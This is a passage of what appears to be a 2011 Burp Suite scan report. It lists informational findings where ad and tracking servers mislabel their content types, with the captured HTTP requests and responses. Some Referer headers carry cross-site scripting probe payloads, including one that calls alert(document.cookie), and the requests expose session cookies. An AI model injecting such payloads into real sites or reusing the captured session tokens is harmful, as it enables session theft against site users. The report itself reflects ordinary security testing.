Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: human_user=true; __utmb=69622787; __utmc=69622787; __utma=69622787.1197951510.1296677341.1296677341.1296677341.1; __utmz=69622787.1296677346.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/43|utmcmd=referral; PHPSESSID=uuhtplkaiu2jk4296c5eo0e3e1

Response

HTTP/1.0 200 OK
Date: Wed, 02 Feb 2011 20:08:16 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
Content-Length: 9003

<graph
caption='Stats Graph'
subCaption=''
numdivlines='3'
showgridbg='1'
lineThickness='1'
animation='1'
showNames='0'
showValues='0'
numVDi
...[SNIP]...

29.23. http://boardreader.com/moduleindex.php previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://boardreader.com
Path:	/moduleindex.php

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html; charset=UTF-8

The response states that it contains HTML. However, it actually appears to contain XML.

Request

Response

29.24. http://bs.serving-sys.com/BurstingPipe/ActivityServer.bs previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://bs.serving-sys.com
Path:	/BurstingPipe/ActivityServer.bs

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html

The response states that it contains HTML. However, it actually appears to contain script.

Request

Response

29.25. http://cdn.demdex.net/dm/ previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://cdn.demdex.net
Path:	/dm/

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html; charset=iso-8859-1

The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /dm/ HTTP/1.1
Host: cdn.demdex.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: demdex=dv2:eLHun3HgfhcbrRmH3JUk3A==;

Response

HTTP/1.1 404 Not Found
Server: Apache
Content-Type: text/html; charset=iso-8859-1
Cache-Control: max-age=3600
Date: Wed, 02 Feb 2011 16:18:37 GMT
Content-Length: 15
Connection: close

File not found.

29.26. https://fpdownload.macromedia.com/get/flashplayer/current/swflash.cab previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	https://fpdownload.macromedia.com
Path:	/get/flashplayer/current/swflash.cab

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain

The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /get/flashplayer/current/swflash.cab HTTP/1.1
Host: fpdownload.macromedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

29.27. http://fpdownload2.macromedia.com/get/shockwave/cabs/flash/swflash.cab previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://fpdownload2.macromedia.com
Path:	/get/shockwave/cabs/flash/swflash.cab

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain

The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

Response

29.28. https://gc.synxis.com/XBE/Popups/InfoPopup.aspx previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	https://gc.synxis.com
Path:	/XBE/Popups/InfoPopup.aspx

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html; charset=utf-8

The response states that it contains HTML. However, it actually appears to contain plain text.

Request

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 158
Date: Tue, 01 Feb 2011 15:33:45 GMT
Connection: close

29.29. http://hostedusa3.whoson.com/include.js previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://hostedusa3.whoson.com
Path:	/include.js

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html

The response states that it contains HTML. However, it actually appears to contain script.

Request

GET /include.js HTTP/1.1
Host: hostedusa3.whoson.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

29.30. http://hostedusa3.whoson.com/invite.js previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://hostedusa3.whoson.com
Path:	/invite.js

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html

The response states that it contains HTML. However, it actually appears to contain script.

Request

GET /invite.js HTTP/1.1
Host: hostedusa3.whoson.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

29.31. http://investing.money.msn.com/mv/MarketStatus previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://investing.money.msn.com
Path:	/mv/MarketStatus

Issue detail

The response contains the following Content-type statement:

Content-Type: application/json; charset=utf-8

The response states that it contains JSON. However, it actually appears to contain plain text.

Request

GET /mv/MarketStatus?callback=jsonp1296683262090 HTTP/1.1
Host: investing.money.msn.com
Proxy-Connection: keep-alive
Referer: http://money.msn.com/investing?6e5ec%22%3E%3Cscript%3Ealert(1)%3C/script%3Ef4e8bec2fdd=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mh=MSFT; CC=US; CULTURE=EN-US; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; __qca=P0-161320755-1294800573610; Sample=69; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; MUID=DC63BAA44C3843F38378B4BB213E0A6F

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: application/json; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
Set-Cookie: ASP.NET_SessionId=uqcec5wmdecydafkxynm5hm1; path=/; HttpOnly
X-AspNetMvc-Version: 2.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
Date: Wed, 02 Feb 2011 21:46:50 GMT
Content-Length: 48

jsonp1296683262090(["U.S. markets closed",7989])

29.32. http://investing.money.msn.com/mv/RecentQuotes/ previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://investing.money.msn.com
Path:	/mv/RecentQuotes/

Issue detail

The response contains the following Content-type statement:

Content-Type: application/json; charset=utf-8

The response states that it contains JSON. However, it actually appears to contain plain text.

Request

GET /mv/RecentQuotes/?callback=jsonp1296683262089 HTTP/1.1
Host: investing.money.msn.com
Proxy-Connection: keep-alive
Referer: http://money.msn.com/investing?6e5ec%22%3E%3Cscript%3Ealert(1)%3C/script%3Ef4e8bec2fdd=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mh=MSFT; CC=US; CULTURE=EN-US; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; __qca=P0-161320755-1294800573610; Sample=69; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; MUID=DC63BAA44C3843F38378B4BB213E0A6F

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: application/json; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
Set-Cookie: ASP.NET_SessionId=mkkaeyj1v22gtsetrrqht41w; path=/; HttpOnly
X-AspNetMvc-Version: 2.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
Date: Wed, 02 Feb 2011 21:46:50 GMT
Content-Length: 24

jsonp1296683262089([""])

29.33. http://kona5.kontera.com/KonaGet.js previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://kona5.kontera.com
Path:	/KonaGet.js

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain

The response states that it contains plain text. However, it actually appears to contain script.

Request

GET /KonaGet.js?u=1296570530969&p=131855&k=http%3A//www.montanaplates.com/880540-Twitter-Tweets-about-Llc-as-of-January-20-2011.htmljpNNP3&al=1&l=http%3A//www.montanaplates.com/880540-Twitter-Tweets-about-Llc-as-of-January-20-2011.html&t=Twitter+Tweets+about+Llc+as+of+January+20+%2C+2011+-+Montana+Plates&m1=Montana+LLC+%2C+llc+%2C+Montana+Liscence+plates&rId=0&rl=0&1=14&mod=65563&rm=1&dc_aff_id=0&add=FlashVer_Shockwave%20Flash%2010.1%20r103|user_|session_ HTTP/1.1
Host: kona5.kontera.com
Proxy-Connection: keep-alive
Referer: http://www.montanaplates.com/880540-Twitter-Tweets-about-Llc-as-of-January-20-2011.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: KONA_USER_GUID=F3BC9B36-258A-11E0-835C-00163E201265

Response

HTTP/1.0 200 OK
Content-Type: text/plain
Content-Length: 581
Connection: close

konaSafe(function(){
reJsonResponse({ "konaPostalCode" : "75207", "konaLat" : "32.7825012", "konaLon" : "-96.8207016" });
teUrl='http://te.kontera.com/ContentLink/ContentLink?publisherId=131855&layout
...[SNIP]...

29.34. https://leads.demandbase.com/ previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	https://leads.demandbase.com
Path:	/

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html; charset=UTF-8

The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET / HTTP/1.1
Host: leads.demandbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: cluid=236660194602537908;

Response

29.35. http://local.msn.com/ten-day.aspx previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://local.msn.com
Path:	/ten-day.aspx

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html

The response states that it contains HTML. However, it actually appears to contain XML.

Request

GET /ten-day.aspx?q=New York-NY&zip=10038 HTTP/1.1
Host: local.msn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 400 Bad Request
Content-Type: text/html
Date: Wed, 02 Feb 2011 15:33:57 GMT
Connection: close
Content-Length: 20

<h1>Bad Request</h1>

29.36. http://local.msn.com/weather.aspx previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://local.msn.com
Path:	/weather.aspx

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html

The response states that it contains HTML. However, it actually appears to contain XML.

Request

GET /weather.aspx?q=New York-NY&zip=10038 HTTP/1.1
Host: local.msn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 400 Bad Request
Content-Type: text/html
Date: Wed, 02 Feb 2011 15:33:55 GMT
Connection: close
Content-Length: 20

<h1>Bad Request</h1>

29.37. https://maps-api-ssl.google.com/maps/api/js previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	https://maps-api-ssl.google.com
Path:	/maps/api/js

Issue detail

The response contains the following Content-type statement:

Content-Type: text/javascript; charset=UTF-8

The response states that it contains script. However, it actually appears to contain plain text.

Request

GET /maps/api/js HTTP/1.1
Host: maps-api-ssl.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

29.38. http://maps.google.com/maps/api/js previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://maps.google.com
Path:	/maps/api/js

Issue detail

The response contains the following Content-type statement:

Content-Type: text/javascript; charset=UTF-8

The response states that it contains script. However, it actually appears to contain plain text.

Request

GET /maps/api/js HTTP/1.1
Host: maps.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TZ=360; SSDATA-DOMAIN=ikjREw(0:; NID=43=pmnSJWiZwGth09kNohAMwJvIpkIdJSJlqyMqx-omPXiSQSzkkNSHqGwv9A9J-zJ5JWsywblLTMJRa23z5AiuJrUbUWrTlS9i8IOD2l1hjJpMR5EY4CTSxmfm-gxCfk12; PREF=ID=11a9f75446a95c33:U=f6f0157cbdaf97f8:FF=0:TM=1293845297:LM=1295377703:GM=1:S=8wu8JKm_kVjmCdUt;

Response

HTTP/1.1 200 OK
Content-Type: text/javascript; charset=UTF-8
Vary: Accept-Language
Date: Wed, 02 Feb 2011 15:34:11 GMT
Server: mafe
Cache-Control: private, x-gzip-ok=""
X-XSS-Protection: 1; mode=block
Connection: close

alert("The Google Maps API server rejected your request. The \x22sensor\x22 parameter specified in the request must be set to either \x22true\x22 or \x22false\x22.")

29.39. http://now.eloqua.com/visitor/v200/svrGP.aspx previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://now.eloqua.com
Path:	/visitor/v200/svrGP.aspx

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html; charset=utf-8

The response states that it contains HTML. However, it actually appears to contain script.

Request

GET /visitor/v200/svrGP.aspx?pps=70&siteid=2074&ref=http://www.astaro.com/newsletter?uid=90d583b---24cb6%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E78300d896e1&ms=422 HTTP/1.1
Host: now.eloqua.com
Proxy-Connection: keep-alive
Referer: http://www.astaro.com/newsletter?uid=90d583b---24cb6%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E78300d896e1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ELOQUA=GUID=832D38EEC08246AA9E81E93E71DE673D; ELQSTATUS=OK

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
P3P: CP="IDC DSP COR DEVa TAIa OUR BUS PHY ONL UNI COM NAV CNT STA",
X-Powered-By: ASP.NET
Date: Tue, 01 Feb 2011 13:54:57 GMT
Content-Length: 86

function GetElqCustomerGUID(){ return '832d38ee-c082-46aa-9e81-e93e71de673d'; }

29.40. http://offers.lendingtree.com/splitter/splitter.ashx previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://offers.lendingtree.com
Path:	/splitter/splitter.ashx

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html; charset=utf-8

The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /splitter/splitter.ashx HTTP/1.1
Host: offers.lendingtree.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 500 Internal Server Error
Cache-Control: private
Content-Type: text/html; charset=utf-8
Date: Tue, 01 Feb 2011 15:37:01 GMT
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Nickname: Scooby Doo
X-Powered-By: ASP.NET
Content-Length: 48
Connection: Close

The given key was not present in the dictionary.

29.41. http://omnituremarketing.tt.omtrdc.net/m2/omnituremarketing/mbox/standard previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://omnituremarketing.tt.omtrdc.net
Path:	/m2/omnituremarketing/mbox/standard

Issue detail

The response contains the following Content-type statement:

Content-Type: text/javascript

The response states that it contains script. However, it actually appears to contain plain text.

Request

GET /m2/omnituremarketing/mbox/standard?mboxHost=www.omniture.com&mboxSession=1296661217505-786518&mboxPage=1296661217505-786518&mboxCount=2&profile.geo_continent_code=6&profile.geo_area_code=214&profile.tnt_customer=false&profile.customer_status=prospect&profile.language=en&mbox=omniTargetingInfo&mboxId=1&mboxTime=1296639617509&mboxURL=http%3A%2F%2Fwww.omniture.com%2Fen%2Fprivacy%2F2o7%3Ff%3D2o7&mboxReferrer=&mboxVersion=38 HTTP/1.1
Host: omnituremarketing.tt.omtrdc.net
Proxy-Connection: keep-alive
Referer: http://www.omniture.com/en/privacy/2o7?f=2o7
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/javascript
Content-Length: 172
Date: Wed, 02 Feb 2011 15:39:29 GMT
Server: Test & Target

mboxFactories.get('default').get('omniTargetingInfo',1).setOffer(new mboxOfferDefault()).loaded();mboxFactories.get('default').getPCId().forceId("1296661217505-786518.17");

29.42. http://r.nexac.com/e/getdata.xgi previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://r.nexac.com
Path:	/e/getdata.xgi

Issue detail

The response contains the following Content-type statement:

Content-type: text/html

The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /e/getdata.xgi HTTP/1.1
Host: r.nexac.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: na_tc=Y; OAX=rcHW800+KPMAAfCd;

Response

29.43. http://rad.msn.com/ADSAdClient31.dll previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://rad.msn.com
Path:	/ADSAdClient31.dll

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html; Charset=utf-8

The response states that it contains HTML. However, it actually appears to contain script.

Request

Response

29.44. http://scripts.omniture.com/global/scripts/targeting/dyn_prop.php previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://scripts.omniture.com
Path:	/global/scripts/targeting/dyn_prop.php

Issue detail

The response contains the following Content-type statement:

Content-Type: application/javascript

The response states that it contains script. However, it actually appears to contain plain text.

Request

Response

29.45. http://showads.pubmatic.com/AdServer/AdServerServlet previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://showads.pubmatic.com
Path:	/AdServer/AdServerServlet

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html

The response states that it contains HTML. However, it actually appears to contain script.

Request

GET /AdServer/AdServerServlet?operId=2&pubId=26248&siteId=26263&adId=21091&kadwidth=160&kadheight=600&kbgColor=ffffff&ktextColor=000000&klinkColor=3366FF&pageURL=http://www.orbitz.com/App/PerformMDLPDealsContent&frameName=http_www_orbitz_comAppPerformMDLPDealsContentkomli_ads_frame12624826263&kltstamp=2011-1-1%209%3A23%3A30&ranreq=0.3423423212952912&timezone=-6&screenResolution=1920x1200&inIframe=0&adPosition=937x643&adVisibility=3 HTTP/1.1
Host: showads.pubmatic.com
Proxy-Connection: keep-alive
Referer: http://www.orbitz.com/App/PerformMDLPDealsContent?deal_id=promotions&cnt=PRO&type=oa_qs35daf%22style%3d%22x%3aexpression(alert(1))%221333ba1041f
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: KADUSERCOOKIE=4AC32DB0-0B6A-48EE-BE74-FD6E7D9BC764; KRTBCOOKIE_80=1336-82d726c3-44ee-407c-85c4-39a0b0fc11ef.30767.16681.&KRTB&1685-82d726c3-44ee-407c-85c4-39a0b0fc11ef.30767.16681.; KRTBCOOKIE_22=488-pcv:1|uid:3011330574290390485; KRTBCOOKIE_153=1923-41yKvrFZ3L_6C466tA2Vu-Rdi-v6AY_r4FlErZjJ; KRTBCOOKIE_148=1699-uid:D8DB51BF08484217F5D14AB47F4002AD; KRTBCOOKIE_133=1873-6ch47d7o8wtv; KRTBCOOKIE_58=1344-CA-00000000456885722; KRTBCOOKIE_16=226-uid:3271971346728586924; KRTBCOOKIE_57=476-uid:4760492999213801733; PUBRETARGET=82_1389464380.78_1389464380.1113_1297450679.806_1325962677.1039_1297450683.445_1302634725.825_1297450726.1834_1297470581.1444_1298250150; KTPCACOOKIE=YES

Response

29.46. http://sociallist.org/widget.js previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://sociallist.org
Path:	/widget.js

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html; charset=UTF-8

The response states that it contains HTML. However, it actually appears to contain script.

Request

GET /widget.js?type=1&cols=3&rows=10&button_dx=160&button_dy=160&lang=en HTTP/1.1
Host: sociallist.org
Proxy-Connection: keep-alive
Referer: http://www.montanaplates.com/880540-Twitter-Tweets-about-Llc-as-of-January-20-2011.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: nginx/0.9.1
Date: Tue, 01 Feb 2011 14:28:10 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.2.14
Content-Length: 7223

eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--){d[e(c)]=k[c]||e(c)}k=[function(e)
...[SNIP]...

29.47. http://sr2.liveperson.net/hcp/html/mTag.js previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://sr2.liveperson.net
Path:	/hcp/html/mTag.js

Issue detail

The response contains the following Content-type statement:

Content-Type: application/x-javascript

The response states that it contains script. However, it actually appears to contain unrecognised content.

Request

GET /hcp/html/mTag.js?site=15744040 HTTP/1.1
Host: sr2.liveperson.net
Proxy-Connection: keep-alive
Referer: http://www.orbitz.com/shop/hotelsearch?type=hotel&hotel.typeOfSearch=keyword&hotel.locationKeywordInput.key=Boston%2C+MA%2C+United+States&hotel.locId=loc.pid%3A11231&hotel.locationAddressInput.addressInput.countryCode=US&hotel.locationAddressInput.addressInput.addressLine1=&hotel.locationAddressInput.addressInput.city=&hotel.locationAddressInput.addressInput.stateProvinceCode=&hotel.locationAddressInput.addressInput.postalCode=&hotel.hotelSearchDetails.checkinDate=02%2F01%2F11&hotel.hotelSearchDetails.checkoutDate=02%2F02%2F11&hotel.hotelSearchDetails.numberOfRooms=1&hotel.hotelSearchDetails.rooms%5B0%5D.numberOfAdults=2&hotel.hotelSearchDetails.rooms%5B1%5D.numberOfAdults=1&hotel.hotelSearchDetails.rooms%5B2%5D.numberOfAdults=1&hotel.hotelSearchDetails.rooms%5B3%5D.numberOfAdults=1&hotel.hotelRating=&hotel.hotelChain=&hotel.hotelName=&hotel.couponCode=&search=Search
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: LivePersonID=LP i=16101423669632,d=1294435351

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Content-Location: http://sales.liveperson.net/lpWeb/default_BETA//hcpv/emt/mtag.js?site=15744040
Last-Modified: Sun, 17 Oct 2010 14:38:28 GMT
Accept-Ranges: bytes
ETag: "4de42f686ecb1:1b56"
Server: Microsoft-IIS/6.0
P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM"
X-Powered-By: ASP.NET
Vary: Accept-Encoding
Date: Tue, 01 Feb 2011 15:24:15 GMT
Connection: close
Content-Length: 17314

eval((function(s){var a,c,e,i,j,o="",r,t=".....................................................................................................................$@^`~";for(i=0;i<s.length;i++){r=t+s[i][
...[SNIP]...

29.48. http://sr2.liveperson.net/visitor/addons/deploy.asp previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://sr2.liveperson.net
Path:	/visitor/addons/deploy.asp

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html

The response states that it contains HTML. However, it actually appears to contain XML.

Request

Response

29.49. https://trustseal.verisign.com/getseal previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	https://trustseal.verisign.com
Path:	/getseal

Issue detail

The response contains the following Content-type statement:

Content-Type: text/javascript

The response states that it contains script. However, it actually appears to contain plain text.

Request

GET /getseal HTTP/1.1
Host: trustseal.verisign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Cache-Control: max-age=0, must-revalidate
ETag:
Content-Type: text/javascript
Date: Wed, 02 Feb 2011 15:42:20 GMT
Connection: close

29.50. http://trw.com/00_assets/02_videos/Orb_Loop.flv previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://trw.com
Path:	/00_assets/02_videos/Orb_Loop.flv

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain

The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

Response

29.51. http://trw.com/sites/default/themes/trw/images/footer_sep.gif previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://trw.com
Path:	/sites/default/themes/trw/images/footer_sep.gif

Issue detail

The response contains the following Content-type statement:

Content-Type: image/gif

The response states that it contains a GIF image. However, it actually appears to contain a JPEG image.

Request

GET /sites/default/themes/trw/images/footer_sep.gif HTTP/1.1
Host: trw.com
Proxy-Connection: keep-alive
Referer: http://trw.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESS6ce6c8782f0180a7bbf1be6e3bdd5794=irfb6j6tguh6qri8bi1dehb9l5; has_js=1

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 19:15:42 GMT
Server: Apache/2.2.10 (Win32) PHP/5.2.6
Last-Modified: Tue, 09 Dec 2008 21:03:06 GMT
ETag: "2000000000df7-139-45da37852c419"
Accept-Ranges: bytes
Content-Length: 313
Content-Type: image/gif

......JFIF.....d.d......Ducky.......Q......Adobe.d.....................................................

...................... ..
.
............................................................
...[SNIP]...

29.52. http://twitter.com/favorites/toptweets.json previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://twitter.com
Path:	/favorites/toptweets.json

Issue detail

The response contains the following Content-type statement:

Content-Type: application/json; charset=utf-8

The response states that it contains JSON. However, it actually appears to contain plain text.

Request

GET /favorites/toptweets.json?callback=TWTR.Widget.receiveCallback_1&since_id=32832741422665728&refresh=true&include_rts=true&clientsource=TWITTERINC_WIDGET&1296663641139=cachebust HTTP/1.1
Host: twitter.com
Proxy-Connection: keep-alive
Referer: http://twitter.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: guest_id=129452629042599503; k=173.193.214.243.1296227675375304; __utmz=43838368.1296314194.3.3.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/92; original_referer=4bfz%2B%2BmebEkRkMWFCXm%2FCUOsvDoVeFTl; __utma=43838368.1078689092.1296223511.1296521894.1296663641.5; __utmc=43838368; __utmv=43838368.lang%3A%20en; __utmb=43838368.3.10.1296663641; _twitter_sess=BAh7CToPY3JlYXRlZF9hdGwrCPJPud4tAToVaW5fbmV3X3VzZXJfZmxvdzAi%250ACmZsYXNoSUM6J0FjdGlvbkNvbnRyb2xsZXI6OkZsYXNoOjpGbGFzaEhhc2h7%250AAAY6CkB1c2VkewA6B2lkIiUwZWU5YmE5M2IzN2U4M2Y4NTU1ODc1MGJjZTQ2%250AY2E4OQ%253D%253D--ef6ced9d16358caf25f8d9b08a62f50e6303ddca

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 16:20:13 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296663613-89395-327
X-RateLimit-Limit: 150
ETag: "c4496a2500a04acae94431807a040161"-gzip
Last-Modified: Wed, 02 Feb 2011 16:20:13 GMT
X-RateLimit-Remaining: 150
X-Runtime: 0.04420
X-Transaction-Mask: 0b5b266a28469a7b52ded76c9a66f018
Content-Type: application/json; charset=utf-8
Pragma: no-cache
X-RateLimit-Class: api
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
